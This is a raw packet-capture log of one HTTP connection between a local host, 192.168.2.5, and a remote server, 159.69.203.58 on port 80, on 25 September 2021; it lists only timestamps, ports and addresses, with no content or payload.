Sep 25, 2021 10:15:03.480880022 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.480884075 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.480890036 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.480895042 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.480911016 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.480931044 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.480942965 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.480946064 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.480947018 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.480962038 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.480976105 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.480994940 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.480997086 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.481000900 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.481010914 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.481025934 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.481041908 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.481055021 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.481056929 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.481060982 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.481071949 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.481086969 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.481101036 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.481112957 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.481118917 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.481120110 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.481137037 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.481152058 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.481159925 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.481164932 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.481167078 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.481184006 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.481198072 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.481214046 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.481228113 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.481230974 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.481241941 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.481244087 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.481276035 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.481280088 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.481324911 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.577807903 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.600239038 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.600280046 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.600305080 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.600328922 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.600356102 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.600382090 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.600404978 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.600430012 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.600430012 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.600452900 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.600475073 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.600500107 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.600522995 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.600549936 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.600560904 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.600569010 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.600572109 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.600574017 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.600577116 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.600579977 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.600583076 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.600584984 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.600598097 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.600620985 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.600640059 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.600645065 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.600646019 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.600670099 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.600687027 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.600692987 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.600713968 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.600740910 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.600742102 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.600764036 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.600768089 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.600785017 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.600810051 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.600831985 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.600838900 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.600842953 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.600853920 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.600877047 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.600898981 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.600913048 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.600924969 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.600949049 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.600960970 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.600965023 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.600971937 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.600994110 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.600996017 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.601017952 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.601042032 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.601042986 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.601063013 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.601067066 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.601072073 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.601087093 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.601113081 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.601125956 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.601136923 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.601157904 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.601162910 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.601186037 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.601188898 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.601196051 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.601214886 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.601222038 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.601237059 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.601257086 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.601260900 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.601284027 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.601306915 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.601329088 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.601334095 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.601351976 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.601356983 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.601358891 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.601389885 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.601402044 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.601413012 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.601435900 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.601447105 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.601458073 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.601480007 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.601502895 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.601511955 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.601516008 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.601530075 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.601555109 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.601577997 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.601591110 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.601596117 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.601603031 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.601627111 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.601661921 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.601685047 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.601686954 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.601689100 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.601710081 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.601738930 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.601768017 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.601773024 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.601784945 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.601809978 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.601810932 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.601835012 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.601861954 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.601866007 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.601883888 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.601886988 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.601911068 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.601931095 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.601934910 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.601958036 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.601958990 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.601960897 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.601983070 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.601999998 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.602006912 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.602030993 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.602057934 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.602062941 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.602078915 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.602086067 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.602113008 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.602135897 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.602154016 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.602159023 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.602159023 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.602191925 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.602216005 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.602235079 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.602240086 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.602240086 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.602266073 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.602292061 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.602309942 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.602314949 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.602314949 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.602339983 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.602364063 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.602390051 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.602391005 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.602394104 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.602416039 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.602441072 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.602468014 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.602468967 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.602485895 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.602492094 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.602515936 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.602540016 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.602564096 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.602582932 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.602588892 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.602588892 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.602591991 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.602612019 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.602612972 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.602638006 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.602663994 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.602684021 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.602685928 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.602689981 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.602762938 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.602787018 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.603529930 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.603560925 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.603585005 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.603636026 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.603652000 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.672425985 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.696712971 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.696737051 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.696758032 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.696775913 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.696793079 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.696810007 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.696825981 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.696841955 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.696857929 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.696875095 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.696894884 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.696913004 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.696928978 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.696930885 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.696945906 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.696948051 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.696963072 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.696978092 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.696995020 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.697010040 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.697030067 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.697048903 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.697057009 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.697063923 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.697066069 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.697082043 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.697098017 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.697113991 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.697129965 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.697145939 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.697163105 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.697165966 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.697166920 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.697185040 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.697201967 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.697218895 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.697236061 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.697251081 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.697268009 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.697274923 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.697280884 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.697283983 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.697304010 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.697321892 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.697338104 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.697355032 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.697371006 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.697386980 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.697402000 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.697402954 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.697406054 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.697419882 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.697439909 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.697458029 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.697474003 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.697490931 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.697506905 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.697523117 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.697534084 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.697540045 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.697540045 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.697556973 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.697576046 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.697594881 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.697611094 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.697628975 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.697644949 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.697675943 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.697693110 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.697701931 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.697705030 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.697709084 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.697730064 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.697756052 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.697781086 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.697808027 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.697810888 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.697818041 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.697835922 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.697866917 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.697895050 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.697937965 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.697942972 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.697982073 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.698014975 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.698036909 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.698059082 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.698064089 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.698065996 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.698095083 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.698122025 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.698143005 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.698168993 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.698194027 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.698201895 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.698205948 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.698224068 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.698282003 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.698302031 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.698318958 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.698324919 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.698324919 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.698338985 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.698369980 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.698398113 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.698425055 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.698478937 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.698482990 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.698488951 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.698554993 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.698570013 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.698576927 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.698590040 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.698620081 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.698648930 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.698657036 CEST	80	49744	159.69.203.58	192.168.2.5
Sep 25, 2021 10:15:03.698678017 CEST	49744	80	192.168.2.5	159.69.203.58
Sep 25, 2021 10:15:03.698678970 CEST	80	49744	159.69.203.58	192.168.2.5
